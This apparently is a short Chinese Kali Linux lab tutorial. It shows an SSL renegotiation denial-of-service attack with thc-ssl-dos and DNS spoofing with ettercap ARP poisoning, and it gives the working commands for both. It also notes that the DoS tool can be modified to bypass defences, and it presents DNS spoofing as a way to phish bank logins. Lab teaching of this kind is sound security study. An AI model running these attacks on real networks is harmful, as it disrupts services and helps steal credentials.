針對SSL/TLS的拒絕服務攻擊以及使用ettercap進行DNS欺騙
一. thc-ssl-dos
1.簡介
(1).SSL 協商加密對效能開銷增加,大量握手請求會導致 DOS
(2).利用 SSL secure Renegotiation 特性,在單一 TCP 連線中生成數千個 SSL 重連線請求,造成伺服器資源過載
(3).與流量式拒絕訪問攻擊不同,thc-ssl-dos 可以利用 dsl 線路打垮 30G 頻寬的伺服器
(4).伺服器平均可以處理 300 次/秒 SSL 握手請求
(5).對 SMTPS、POP3S 等服務同樣有效
2.用法
root@kali:~# thc-ssl-dos 10.10.10.132 80 --accept
3.解決辦法和對策
禁用 SSL-Renegotiation、使用 SSL Accelerator
通過修改 thc-ssl-dos原始碼,可以繞過以上兩種對策
二、用ettercap進行DNS欺騙攻擊
DNS欺騙攻擊: 目標將其DNS請求傳送到攻擊者這 裡,然後攻擊者偽造DNS響應,將正確的IP地址替換為其他IP,之後你就登陸了這個攻擊者指定的IP,而攻擊者早就在這個IP中安排好了一個偽造的網站 如某銀行網站,從而騙取使用者輸入他們想得到的資訊,如銀行賬號及密碼等,這可以看作一種網路釣魚攻擊的一種方式。
1、使用另一臺xp作為攻擊靶機,檢視主機IP 地址 :192.168.14.158,閘道器地址為:192.168.14.2 , 正常執行:ping ofollow,noindex" target="_blank">www.sina.com.cn 可以看到解析的地址為:112.25.53.229;
2、 使用kali 進行攻擊,檢視攻擊者機ip地址:192.168.14.157,
3、修改ettercap配置檔案:vi /etc/ettercap/etter.dns,增加一條新的A紀錄,將 www.sina.com.cn 解析指向攻擊者主機,儲存退出
4.開啟進行DNS欺騙攻擊:ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.14.158// /192.168.14.2//
5、進行DNS 欺騙後,再次測試:ping www.sina.com.cn ,發現將www.sina.com.cn 解析指向了攻擊者主機(192.168.14.157)
測試成功,成功解析到攻擊者主機